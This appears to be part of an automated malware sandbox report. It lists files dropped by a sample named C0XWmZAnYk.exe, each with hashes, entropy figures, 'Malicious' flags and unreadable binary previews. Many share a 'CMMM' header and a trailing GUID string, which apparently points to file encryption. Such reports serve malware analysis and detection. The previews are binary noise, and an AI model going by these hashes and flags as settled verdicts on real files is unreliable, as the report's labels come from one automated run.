              Entropy (8bit):7.98976816933831
              Encrypted:false
              SSDEEP:384:4aEnsD+bIHq9GpWy33dWXk0MJ4kMTMPNGYvP:hEsD6833dWxc4kMoVGs
              MD5:F85A9DD2A576853C3C0BCD7282411736
              SHA1:55F76740704A2E182130683F06349D8277C6476F
              SHA-256:F9150600B5C77A87AED7EFAF17853F89016D9891CBE81C52212D83E9048BEF50
              SHA-512:8004A8D3297BC62D8B3752133FAA2FFC57476A574332B1936BF440DCF69C9FE5D23FB4C010EA5F3DE4B2BEC96B8DA2E42D426B357FE5412F659FB1FB659E7236
              Malicious:false
              Preview:.... }^..O.pk.....38x.(.Wr.<D...P....NM5).26...F....c..HV[.......<K*.3....f.y.}...f.[...=...\n..9v.'../.......(..\.B....x(....q...O..@^...D.&|....O>x....R....t{H]a.......c....OrhFE.ya.o.2..F..8......'"...s....OE..`..I).!.....yS.j...c...yer........4..r.=.......<....]:.......+]...O./......U.....BT?.....}0.^sI..\t:.K@......lu... Xf|.0~.p.w..D@.....FS.N.F...|......E|.......F..Z'F..yF..Q.yJY.s.*....}.K...^.*.N..K..E...s.0W.a5^GN2......c.>..U....9.H.s[.1.|..w..z'r....kN..y'...(n5).......2Vq..7..~d}........I....&v..M....g...-g'..a..*.S.}.O..@..:B`bs..j._...~...ySQ...(.U....~V.S.3$.,.j.....;(\.SYd...`..F......:.K..D.$.}..q).L..?.y/.....\X".........[.#=..e........L.p..I......e.s....r@.......8.${f.:.sk.R{Z/I..3.*U...FA.).#Z.9_..$E.U..2f..j.......Y..%.8P..Zjd...I.......(w.2u?E,.q.lR.....$/.....*.....i....^JR...Z?...~.V..~7.z(<.d....&.....1w.T.....<.@g..9..x;..I.!....?x.0..m...U.......({Z+..,4_... .W.&1...y....'..g..@....`.04.p,H....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.989188511851705
              Encrypted:false
              SSDEEP:384:u/zf26dr35NWXalshOFm1sJ4/K7lZeBAmP2ctH1y9ds4SRv:yrdTWXLhOFmF/K7kW86dk
              MD5:62B3440FE91DB27A439520F0B68434E5
              SHA1:3B0F06D0F60C8923853E73F9286FEC65B3F45AB1
              SHA-256:8A5452DB9FB34AF4FCA0B0EDCCAACFDF2D0C64549E46E14712E178DD71103CC3
              SHA-512:246DFCC0B6020E50C7A981D8FECD886CA98E5BCA49C07D31692CAC1F293B9DE9CF1D2FC90608C0E7B82245A02909645863A87E07F349DE443C43338B71558CFB
              Malicious:false
              Preview:....`.,.x3..^..D.k1..:9.$O.=...j..@E..2.l.$c....|.n.........jI..Gr.&`\K...|f..^w...L...gG.E........FN.o.....fPw.n..@.T..V..U....Fo1...Y.....E-.(...L&.UU.Me/*T.{.c .eyX.p.o.k.9....e.....R.X[....MKO.fn.r_......%..x...6#...?........c..4.ZnW...]....N.).....DZ+..h...Cc..HL...;..A=..j.-nc..z......7A.:Y;Q..u+.>.m..f"..*h[.h.....f.Y.....5Y*..`.?.....;AV......1...Rf....Y..i.".\....D........'.Q..B}...........e:G_>......<.#...YA..q....-OV.B.k.5pt...k.\.^........,.|.*..5.......k.d.d.$!F...Y..2@>..y9.5.....K=vxF..%.=v@.......O..+.y,X{......v...t>'.`.=...(...J...../....3.<.'.......@...-~.f..Rn.rN.H.B..3....A7.x.y#.(@.f.6.NT.".....%.V.....Y.....v.!V..'GQ4.65.q.. .'.........$.o.'}M...cPDG*.../.D.L..........!.....A@_=....n.Gg..?.BL...od.,.M.M..<..k..t`M.Ca...|4.E..jy..^.......g.C..+.....0-rZg.['.....!u...?..1X._...P."g.o.]N\.u..]...y.p.c.N.3..XKi2...xC#I.8."..5Va?tC..3.n..<O........!n.........0R~E.k.2J.:...$.K+.....6+w..l.+.+...t....B.-G...._voo.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):424190
              Entropy (8bit):6.33163031613399
              Encrypted:false
              SSDEEP:6144:7MMuzoKjbBGyyrXcOefrKsb0wSnIm+vyJfbnQkK96B88yKv4bWTmTvEiLSB:7HuNjFwDcHJb0BnIm+6dF4/e
              MD5:D137892C743D5BB67B9375373EFC6227
              SHA1:4D66B79CF0DEF87BEE457264EBD0DB408AE4CDD9
              SHA-256:0C7DDE1F8ABD31D5C48EC8BC3414A87CF5C9AF4E569F127BE12261E934EDD730
              SHA-512:23CC8E25D1BF3C84D8F8FCDF3D6CDE40BE2976B25528FA852CC518D5366F2862092A3A50D3BC4A617EA19274878DA2D52A7B4F76AD39D47BF6F80C6DF371C341
              Malicious:false
              Preview:.w.. ...G=e9....Z.=.dy|.X.f.9I.,.O@E.........../J4q.&A..4K...i..s.....Q.....x.G.....j.rc.B...M{...|&B,y....'7..j.U...}..k?....G.#..q?......X$..Hh.r......`he.,..j.s.^]..n.A..g.{3.=..yCv.I./G...6.......=A..5..~.C.B..;C..j@..U.....>.....$s...d\........?.{..e.e!8#..j........z..^|:.l..AT.....n...G.8.L..y&;...K...;.W..d..2N="....c....|..SXn....w.:.~]..g{..\..0H...MP.@...>.....pG...v.;b.0tr8.I*j..i....%.p..m.....F..6D..9..5...g..U...'..^...i.pd.Sc?......l.O.Z......cSG&.q..n..$b.L.......Mc(..3.aZ.S.......>.U.g/.........7h.(GO.T5...:O.....V..~.u-^9\|..{.. .l.M=..+,..'..o.......3C...\.....).Y_n...0.".^w.?..O.....keu.y.?.....T.......1.2UN0KD.(Q.k7....%...+.>..."..m>...O?C.1s....p....z..?...<.t....o......*.....J.0.F<.OUN.$...........$.nk.....f.7.w.wme......C].....>.9s....-..O.FY#.g..3..2...(.I8}.d-.(.$%..^ VhH$a..i....$.v........j.._._.X..E./7gf..%.......5%Zi.......m..b.......z...G.n.[Loj......i;=....F+b.P..3o.....p&...}.+.L..\..{.H.[{...=O..6..(.[.3....Es...P
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):104062
              Entropy (8bit):7.997963212655048
              Encrypted:true
              SSDEEP:3072:2SBBLZqBVc6Hk5JWkp+rjsBRGEtDIIADwLpYQh871WWi:TtqBZHUWVjYDG8VTWi
              MD5:B2890235B9ABBA6DD05192BD71ECF28C
              SHA1:9BC8EBABA51CEE3F71C266CFF404EC0D972374D7
              SHA-256:C0EA19D427D7D0A94906950A308904976DA07932E8FADB0F7531292A88D421D7
              SHA-512:20951E11A648A97265EB75056C4836676C48C6EF6A84A7F8593908DD0C759E8913800C1AEC78FE07F2ACD6738FFBF0CAAB3B840739AEE33BB0973B4C43BFA6F7
              Malicious:true
              Preview:....h.&.r .........(.K..=a0$....+M......V[x.......k.bL.?>PY!2.. ....Z_.......E8...5.._..ZI..._.6..P..-.-..:.<...f..Av..IZ.ng?:.f@.B5u...w1v..L....j.R....~_..WKb.W.x.6.....K..t.tl_7.....}.....Ks@.E.Xz......;..?..|&`......=,.!-Rh.V..ucm........Z..i.A.=Wd.....W%.w...e....O.5......UJo...E59g./..$y.G4W.9j*.....m....6r}...W.....x-...4J..~].!.H.%.!..TrQ..s..5.F..6.g.E...N.4..H..P.Pn.....f..3.R&..l..\....C..+K......r..>..'B.M0..Z..Q\..MP....[...?U.t.}......?..C.rIMG(/.H..wN.E..f..m.5...J.&...f..W.?:EC.>0t..NN...e'.[....g..P..5..?.....]...5..7.......z..."....i!..I.....%.....t..?K.. .q...,..i..h........Z...wc&.=..R$Q...'5....C.Y.?.di......T...l.sxB.@)W.X2..uh..&.7G...../......w.;...w/B.w...V.<...0_A.'....:I-m.?.......5KM.%....\....PwA{.P...zM."6u....~..v..ps.:.HK_..T...e.i.q..O.Q....f...3.AP.U.E.[%.L.4p.X..%.3?..m.$.R..../.%#...%[1"..\.bLrt<.4`L'..E{.....VH.... ....J...2+.0.2...PL..eS.!....^...I............W7%.#................f.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):102814
              Entropy (8bit):7.9982775098110555
              Encrypted:true
              SSDEEP:3072:u4C27qBsFO7GvztyVeigB8T+XHSF9rX3dsh8BgeHN29I:jCGQMVuRqiF9j3dshQHtP
              MD5:BE908F03B4426540AC3FF64A8D12A464
              SHA1:71BDBFE9E8AFC01BD2A028671C6C472BBC13B64D
              SHA-256:4A8CACEA7E2A7516A382463D9EFC2B5DD22986A214FE46097441D3AFDCEF1659
              SHA-512:FE5363755E96FD9C259C8AED10CDAE9830CEEDF057E9183464CF7BA7CE46B8BE560ECB3CB1F701F23359DC99CAC146E8E82EC62653691E0036261525DF484A21
              Malicious:true
              Preview:....h}%!G.>8.y*..*.91s.D6i....M..[o....[...#X..-\.....>..0.$....X.`H...[....46z..^.=.K].].2.%b<.y.3..IG...b.R.y!.@...02..5XcU.....qP...P..$......6...q\m.t..\.!@...;UH`...t......."/E@B..3qu.8.Q......=9.,D..(#..UN..#w..B.../*.........w...../.m......K....0."....b~..O{.a.........R..|.1..'..1t..-.-#0.V......a.m.z.e`.No......*@......h....]....[..Q.jR.%..8.b[...g].2.".y..z.../S?C.u...\._.A..{...:.$>.}C...i....:.3.vD.....H1.n.%==.K.$7e~..3=...c...H.d........g.C*....f.....=l.5`.~.........X..jv.#...T....9..o&.."....e.l.{..)i.a..|.........p >i..VCc#...g..<w!.....^n-.=..=...h.slI.cu.$e$...-...o.zAs}6?[r.k...].mV.u$...i...;q.;U.?.f..M.....%.....5u...@..q.C.....;.:Nt<........`.P.....9|4f..N....c.Cl.......$..~k.n9.FE...HoI.j...L.....#..u..dVx..Q..K.+.I....80.....f:.i..F.....%.|..R.6$.. .}q.Z!.;..4.G.\u'.U!....U...). ..j.m..y.2....In.!...$....0.h./.v._io..7.......h.a.W..|....Na..y...X....>.'..x^JN......b.f_i....-.#..9. I.....^."....f.iF.H....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):75398
              Entropy (8bit):7.9974265472199235
              Encrypted:true
              SSDEEP:1536:Lv80vpBcAI7Gnw5kHJYvmb4L22Ey+rtNDIoYJtnyKpPR:Lv8yjcNnUJYM4urthSJtnrpPR
              MD5:AA3677B2CC06E101EEFA6B8F3D17841A
              SHA1:DE132DD19875EB0FF2AB662A3573805E7AA7EC6B
              SHA-256:0B05CE5C65A88BF1A14D87AA9217EC25FA7D695FD0E68D476A32FDDA8B2D5F06
              SHA-512:0D1CFB49E645D58969A893102E5318E5EFBBE6C3D02D4030114BF5EC17F3D5041B36ED4A8118B3146F610D23CA84A6F835010906139D61FB7F63687F7CE830AD
              Malicious:true
              Preview:......!.e.y,.Ref.._3..@.....~..pX.....t13..:B.H.3t.l..gb...y....n..*..\..g../.5...C.j1.e.}.!^.Cn..S..lN.V.)..(H...E;...q...Px.!.....&. q3.V..../.+U.t..........1..".>..B.A.:...Ag..8:...F..v..J.<..XZqx.......B.WN..Ot.'1u..F...nZo.M-<~R...T.#...z..........^...,.b.o/sI.l....9.Of..rm...b.u..!@p...$.....o?z"...y.-./.uv#...Q.R....b......L..".c ....'..z..j...P..izA..+$.1...y...T..6n.h<z,l.)1>......g.Kpu)B....rx..-!gVF.O.?@<OX.Vh}&..J.>.....D{..^.r2Q..x9....u.v..t8K{..].E5..P.|4..b.......>..'5/S.Y6.u g......9U..{..+S....+........o..l.....BS../.-.+..DD.........t..4.P.z...-....x&....O..6].b...U....r......8{$.a."....Om.%8.bG..7..[..p...1....C.Z...C...4...._.^..$G....p..>@..2.Y.6..92..%.....``.1K.!..Y.........z.D..U...'.W..(6A./.aT.L..N...(..S......U..,0/t!..;9.wu.0.....?%d@J?..O...*E....p...iT.....]9...x..?..\.....ym...b...5.........y.Wn5|..?..._....xU.Mi....C.v......z.C..F..c..k..5%;.N2..o..L..Q.....E8*.K.C.73.._.......!.H;I.._. _+...VB...4......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):105318
              Entropy (8bit):7.9981014738792435
              Encrypted:true
              SSDEEP:1536:xgWKcCXTog7JPJTYzFI8cN99SJ/2BHBkYglO/PpE5BUDf+fTG3yJdpvbCXSuzgJ:27xtBJUZCs/2BhkfEE5C7gTG3ytQSum
              MD5:C6ED3BCB298CE67174F62DC21F46F307
              SHA1:90E0948EBB60254BED74AE53662319BBAE178D42
              SHA-256:294F5E1177DB9EDB8B917A90E237734E8C94A7287D8C56AA1C552BCF34ED52B9
              SHA-512:706FE03C197EE6393B7D223CB1BE87B50E24CF716C501BDC4D23EC08EC3FF3B465706D0E2A240DD7465A956D8167EAD90CC7EAEE6EFEB6EB05A85CDC45E177A9
              Malicious:true
              Preview:.... .... ...rc.......6/4.I..>.1.. ...C#..1S!..j..V5(.}....c.....Q%>.v7.j.Ntp...c..4.l...5j1.8....p.E.#>..C.~...$..p...I-)........l...=..|j..$.w.I...`~f.5.IBd.....>.....2.........&H.Eu}./$....V.~.\s7@,......Uf....Db........R.....il.^.}......R.."..v.I,.W....D.[......\y.c.^.3...`..p..F..[..~.!J.h\.-O...l(.vv.MC*........l....k.2.;.g.."d.....S.>..r9.{....f.fX.......V.$]....ih...$};...2...=..g%L...Q[$[{(R.....TJ........p.@..a).`..[.6ks.E........R...LAD.....`5o......T+..4.......f%.QZ..R..E..>..K1.$X.........f1.........y.g....{tZa;;(.<....UR_.e...p?.-r..(bw.c..M.l.......n...~p&...E.$.^rU.@E.P..^......m.....f....Qn.t.d=..`.4@.GV'"..d.B.y"...O.A.*...............P..7...... ._.>...T....YgT.*...+czMr..>.....D:...#............;......C^u...O..?......X..Z4y..i)G..I]...D.5jc......L.N...4.....0.^....}...n.CM*.C._........^;]el.. MN:B......t...y.O.Y....V.%..p..]I.....S....y..C2.=.d)i55q@..fy....m....0,.0.1....1#"(.I(...Kq....."..R...E.r.. .AC#p.h.6.A.j.A..[..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):581966
              Entropy (8bit):5.7376629463366795
              Encrypted:false
              SSDEEP:6144:TuB71NiwAEcyM2bolMUL5vdIi93FiNa1mYSOb9Q:aZiqcSoMw5vdd3FiNGmpd
              MD5:4375C30AB58FDDA51AC7DFC01C6F65C7
              SHA1:06A95C48574109F998CB3B6D129231110C16D78F
              SHA-256:EF4074A7F8BD569C1424E491CA6C53280067EEA95DA1E9183DBDA6D1FC95B172
              SHA-512:19E132CC08970DC3532C4755AAE2FC16947444195BF8DBCD23B48F7FA2A3D38959E362F6696534A593DD94D2D47FF0DF23C6F8D5766C53075E4B8E189E0709B9
              Malicious:false
              Preview:. ...aB...%..*$.p.5.&.f....s...m..8Z......l({.....m.i.._..tx......'.+Jv.s..f.X..W..,vH..+qq..S.}.u.L.t..2.6....jb705..X.&.R...kE.0Tsr.. .q_&.mE..@)..T......v.5...M...Z.....w\.+..S... IZ9h.L......../G.v..T.o^./ ..=.b..'...o...k..bw.}.k!...........m.......e*k.E@x.BN.........z.n.b...Cr..P[..B.X.n..'..]........*vc..Gq.{..c.||5).Tl[MT.~...?..^_..9...Q.._..zh5.6.i...d.....F..}......h.....\.AO....,m...........<5s.....(z..Ke....f..].....n.........@c.....N.q...oN=.-._EvPQ.{Y~f.s.].L.P.T.V@W..p..q...q.X)Ch..6z..9...IG..$..D..9u....(..X.fm.6TcL l.j...E.....3..H%......&.,.PU...S...w...39Q3vkr...k..u).d.. ..R...e.!r......~....2.;j..0...g..j.'...qV..R.L.e.....L`.!...a..wGjs....x..O..\.Z..X"._p...b\.[<..'..1:...45m......pQ7u.!..].,..,ln+'.....q.{.6......?I..4*..=.+:..UH.z....-....F.j...=..>..B|...2.kl&.....L.F.4..P..... ...O....;.Z....OmTS.....s.?f+..,K.P...H.}FN..".b,..60.q./...N....\.5.|......H...t...7.2....j.-......k..$...ua....T....<H...%j.;&..3
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992747065996073
              Encrypted:true
              SSDEEP:384:E0XnHZjRMwsMT91B1OgHPQr8siPGw6RgVZ/g+HAD39N6TF:VjqkVYEPOYPGsg+aqh
              MD5:C614D1F3E275FB3ED8F661305E4091E6
              SHA1:66918CD89B3E23D1A11C7D8907F94AC808CD30A5
              SHA-256:143BB8A7DC5DE89DF42E265F6E978877A2590D0235281D4B8D18B9C4A30CED9F
              SHA-512:A321E2F91A602553575CBB289971BC340025D4CB3C763462030AB6FEEAC5E92358A12ECC60E7175D8A8A2E0264BFEAF1CA3D2794E8F20E43E931F13FCBA0B2EE
              Malicious:true
              Preview:. ...h.a.8....E....7h.#rKxgO.E..2.Y..`.7e9X.."6.L!.I..a.[..I..".y-..Q....0H..w..r.i`Z.........%.Q..',..d...s1.r.o.> !<.6.L...s.:87.Bd`...`......RL..~(...uP.{!J..[.......X..uHDi8I0j......|x.....*.V...>..k...z.hj,.j._.Y..J....N5?......0...n=f.....J.;.4....*......3.Id_N.,$..>>.....f..x..$DCw.......Ru...]t..8W....*..'..]r2..8.s.K.2'Wv.P......;6.i.>j"mW.......|4..3..A...xM(.<.w~....4..C.y..E.^..EV+2.....G..`.I............C6.=.z...)a.T.Hr.]......AD?......MV}.Gk..$3....I.....\/....D..#4....K...S[..d......e......]..=...;..`.......5....KE7.&.x.`p'.%Z...vxhD.{..F.a..8H..&..cu.~t..%.._M..5.>..B...........z-7.......r....Sn.^..!.9.j..$.>.>...2.Y#<..........9./&.R....\.i.......U...m.....$<..!ye.t..l..7-...Y.F. .........rsV.?Yw....@.>..$.$....q..c....KA+.w....w!_A..j....x~...E.{3@.".mo...Ms..R..~......0^..B.Z.L.(.S....-.Y.*.d..Ew.._.,.Uu=...j..\^i.w...Zc.Y.Q[T0.f....5....e...?.....R......>.m..M....2e.$6...\.z...@...S.. ......C.~..&..b...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.3373257398370395
              Encrypted:false
              SSDEEP:6:UQMIYJLNCzCjEFW3GxpQjV6jYV71NfhoTBOir75yZPSdxa3cii96Z:vMIYlNHjEFgaQcs1fSTBB7kZadxa3ciD
              MD5:D18D59964FBD38B47AD43F246CE7515B
              SHA1:A189D8235F4A70CE2D6F5A7F57F8ED0F0607CFFD
              SHA-256:0F8C11744904A3E548C29405767A4047057F5C6BBE6CDCC1C9A1EC5914524D2F
              SHA-512:37EEA2BE07A7F13A2B3E7A0D9B3871F44C396FD1CAB8272CC9E8DD557CC01909A9FEA76F711B8B4868D18C9FA43AEAD74788F1FA4930A3A7D7F7E2D3039EF1ED
              Malicious:false
              Preview:CMMM !P.>M.S.)........N...4.C1x..4..IO.....D..l..b.#...k}."my*.h..V..w....R#..p...!..e...U..>1...1.....~]...s...l.j..{.).oK0....Mri....n....|.;.......h.-..!)|........17..pp%T....e.............5.>.........Y.0.......9.....[....r......WQ. I....#!..._.\..LC.<..|gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.309987749358168
              Encrypted:false
              SSDEEP:6:aYz/m3nbw0AjpAxK35hVPxc7h6HsEOMCSdxa3cii96Z:B/qBtGhxxMEbdxa3cii9a
              MD5:42461E68CA1FB576107429EE4571AEEB
              SHA1:FAD51D1C7E1B4F3DC4BDF59062B66B6869A105C9
              SHA-256:4F8CCB6A2D5B556716D597814E6EB6A3DCDC6970CD2751FE16F5FE3802DCA6F5
              SHA-512:56DD074D772DD11FEF708FC8123AE195E18D15A5BA7DC14AC89DE1BE2F94C5615F5123BFD1D591341D00AF2C0CA74B31DA644FF33DE3E32CFF16440A33EA0567
              Malicious:false
              Preview:CMMM .......\7V.l./...U.i.....q4Z_.B...V.v..zB>.u.......@.v..i.jLI..!.\:..O....g.~.W..........\..[..[WO.....1.....x...`.T.>P'.q....;.Qe l......!F..,.......+..~."y4"y.....e..~.x...OO...f..qv{.y.V.2....a.V..O$..a}....I...R.%.7...OzS...9Q...K..0Jq.ad@..3;G.z..ck'.u......d..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.275982443795999
              Encrypted:false
              SSDEEP:6:/dTt24hlFGzkTczVlHeU3XgzxBTWXSJrNpH5npnr7uFBVGfLLcofmSdxa3cii96Z:/dTtDhlFGzbVlHeUHgxBhJRhfvuLVwLm
              MD5:539DD2AEF0A2FF98B8C532017E603496
              SHA1:555900C55DB9847B3143F59CE7DBD146373E6AC1
              SHA-256:53924B68F39917CEDE093E17452118BE9AC53C11184BB4E59FB092F04F1243C6
              SHA-512:285E01E59E80448E3D72A764175957F6E43DF634E979EFE524B8A0D6AFB0C230AC5B18B226BB726D6267EDA16A1F72B29E5D12EEB7AE7FC344D9CDE280930EC6
              Malicious:false
              Preview:CMMM ...iEb...q}D.8.@..t. ;.6.x4..hW.."...m.&.b.v.H.S..Rh=....c....`37...y..Q.m..*.D>.R...}.+.Rv.jU......p3.Y.x.... ....q5..d..jh^.)X@..(......\....T'..5#...y.D.71.b-a*...Pgw\.`.c.;.H@f.Y.JM.O..d...K.Q..(h'[~.g..4c.=....X.C<............q...3.Q..m.yK.\....s...Z;.#.~Z...tgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.302085734209257
              Encrypted:false
              SSDEEP:6:pLxu6qaKJFmTcF9fjqJraP0rBRtxdp9FiVT9pPODGFLW7pY8p/wmSdxa3cii96Z:pLxupzmToaactxdp9FaTv2KFLOpTKdx6
              MD5:E9B2C2DD80E59BEBD5A1118131CB3CD7
              SHA1:18A12229013717CBE71F64069974BE72083777C0
              SHA-256:2C30B5D8A26875DD22A99E136679CE43CC2439AC35A5311E7786BF20F72CE396
              SHA-512:428C261E0D79C3697FCA5C81323530B34268EFAE3EA64FE632DE68132CDD4373B9A42C6E21741FE07E6848D090A637CFC1FD351A7039506F8B06762ACBB4E9ED
              Malicious:false
              Preview:CMMM ./p..n.I;.s...r.d.5.m?i.T...T..5|H<......-./g.- vg..}...Pi^..^.bh%.H:o.....i5.i.......r....:..M....f...D..X..J."........jj....nzt%6z..e&!o.ga2.....i(..c.K......8.!.h.Q...9..e..=.l>...Vt..MN......... B..........9..4.....(....&.........c.....'{y...}...Ap.._{.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.308762716124238
              Encrypted:false
              SSDEEP:6:Orj8BGrk9E9etQq0JOMPOoxw3w6azqEzTNmoD4x9sYcSXSdxa3cii96Z:grk9E9PPg3lazqMx4x9hXidxa3cii9a
              MD5:4BFB62B3600E5A40A8E091F4F1EAFBCE
              SHA1:8061169A7F1EFBC96D0BDB801554F2FA169A0FC4
              SHA-256:B9023A33E2D41C6F62794B2EB75FA36801149CA7644404255404747E16F3223B
              SHA-512:560A4AC5B181435878663C0BECA8DA5CA6C72B665D65B16BE3C00C4D458EA90903C5615601C916264FB45998745A009EFAA4F6F262BB99F5874FC0BDEF60C750
              Malicious:false
              Preview:CMMM ....I...6..<$.#..i.R...t4...g.^$..A{;b..e...[....^A...!...{.u...Y..q.A..+.E....]...B .w.....*.W.Ar.|..5...#.G......_[.3..........:f.;%D.#H...,.r..6.4...........O%H.VU.edO....]r..f.I...(.R......+.0.....[.00..K3...&P..H-.*.y5...)K.P.h..L5.rz.-..q.....**Gp.R.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.289991896017187
              Encrypted:false
              SSDEEP:6:izBUQXq7BQ961hK3IWHTBfKMOPOHIBXAe5v1XEyK95HSdxa3cii96Z:iNw7m96rK3IWHT1KH2ez0Z9Adxa3ciik
              MD5:99F79FAE88584E5FEA54FD057D3F4747
              SHA1:F9A9AE7EB6923BCA0CF11FC65F23CCE27422C3BD
              SHA-256:7D70498808FD50C8A7906667810CB2EC3FDEECF2AA785C637CA16A3BA428E39F
              SHA-512:14DB9BA7C60E569D5EE9D4DBA00A7B9B792532175AE5BECB1D70F90939C9552A814F804086AE8AA8D7D389747F6B8EC757B03C07131CA46278605A17574286F3
              Malicious:false
              Preview:CMMM ..E...55l.E7...._..D'..I3.V..<...!......1../.U..q....@.<.K...G.xV.^...^....`@T5..i........\8RD...u.Hu..X.Mo:.[.T..}a.{}....C....*B.Bo.%.-Z.f....E_.+...V..jj. ....H.E..>.........Jv...tCU../vw\..,+....}..]I...!..{.|...........[..r~..._...../.J....(~.;..@\.<M8..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.3080234353798526
              Encrypted:false
              SSDEEP:6:MCdfpdc8R//TCS0U/AS9OGAmGs/5ivzxh5Hrgna9l/cZhQX6AhaSdxa3cii96Z:DpfRZ0AzsvmGVvNHs4ohQqiPdxa3ciik
              MD5:1DB9555107E6962064DF9E134A98BDED
              SHA1:98A135DA9F667F36ACAD1DB4BF911C732AD96DE3
              SHA-256:45F5FBD172F1AA1541AB1761D90E8D862571F1204021EBA8DF8F7C77D2FAA17C
              SHA-512:E2C79544E1B2B39FD81A0788E593F8E64DA78776D78BF629B99BF1994B1FBBD6255AA57AA30C8DD0CFFBF8537B2DE03F8B2551C6A2CAD31B2DF1CB1E5ED7B439
              Malicious:false
              Preview:CMMM o..IF....s.1...F.p.. ...V..|.8Hu&.:;_D..~f.....!b.z^....7.*..|..S..R.v.P..._.s.Q.^.'...I.HbZ.w.|@.JH\..x..{..H....zh..3...k-..=.A.L......w..]...4....6.]..0c.y.=.;{#zU.Y(.]0"...|.+....\.c..z.....n"N.S.e#...[m_...-....\N.....=9.<...VX..Q+..*...a...2..)y.T.v1|.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.316594578239966
              Encrypted:false
              SSDEEP:6:22Ax3XfCw4sG1q0hn7ggQ9oMAb2NovNRLWDS87j1U8Ym7NeJ8J/NZuSi+C0mSdx6:TAx3PC+GcwnVuASNWRLW/j1U8Y6E8nZ2
              MD5:456503367A1D7623AA5092F5D17EE622
              SHA1:D31CD8F57FEFA5D230A89159026BE0072B9A58F8
              SHA-256:70D462B114CEB32998E329EEA4DB5B1644E1E443CA9C4E2876A0121D8B1A6A97
              SHA-512:C6FBF3B11D0C8C243349E9A8F0001F07642DFDA810E045F263EF1E1E12880841720177E114BD704AF371A70BB884B740BF04B95423A4EFDED75AC47F60870163
              Malicious:false
              Preview:CMMM X1..<.kS.U&..'.m...4F:.....R.Dg!..I.p.4....lo..ml_...p....1.B-..'.H...SY..?e..%.<.K.M..."....C.6.C.U8.y.G~..`lq.i..F(qM$..j...^N...1..........I...Q.=.+./o].nf..|.'b.q.z?.d.Y.......Uv....m.V..\.....lI.p\.b..jA.(.qs.wh.Y.~a..}.MY.t0...).$5TI...k..r....h..$y{6(..lkgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.258294348724995
              Encrypted:false
              SSDEEP:6:ZOPxmbUz4snFGDI9nGOmvkjg1JnrrmCln3V1g5x7TbelDaSdxa3cii96Z:ZOJmgzhnoDI9nDjLCRV1OTqdxa3cii9a
              MD5:1FF0ACCC62E892A37BC0814D36228D78
              SHA1:730DD1B0136C0A1DF8755B605AE06D13F9EB3D5B
              SHA-256:F4B0A2B08B20E98CD0E2B9CB78A260E31C78D04A75DD7A1AA1B182616BCD03CC
              SHA-512:08D2A1481773391D1F6032AFAEF66D812D7D395EC68E2307DEAA374BEDFD8A88AED429BF757DCE626AD05A9B73A1CC6FCF9FBF67393A986F507595C1AEDDA7A7
              Malicious:false
              Preview:CMMM .ph8GHYA{..)..UTb.U.T5.......z..!..+`nnbn.&.N...o1.TP..2....R.4..+.3K.H.~.^..d.@.D.....-.?t...p}h....!8.]..K.wN.~h.-.m.......&;WU#.e..b.3......+2X..u..%...z.x..<...S].;........?^.T.....^.R...A.m8?.l.zu.|m..h..i...x2Fm...Q.....Q....1.....tYo..n3n.X..wS...&ruJ..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.340029334559743
              Encrypted:false
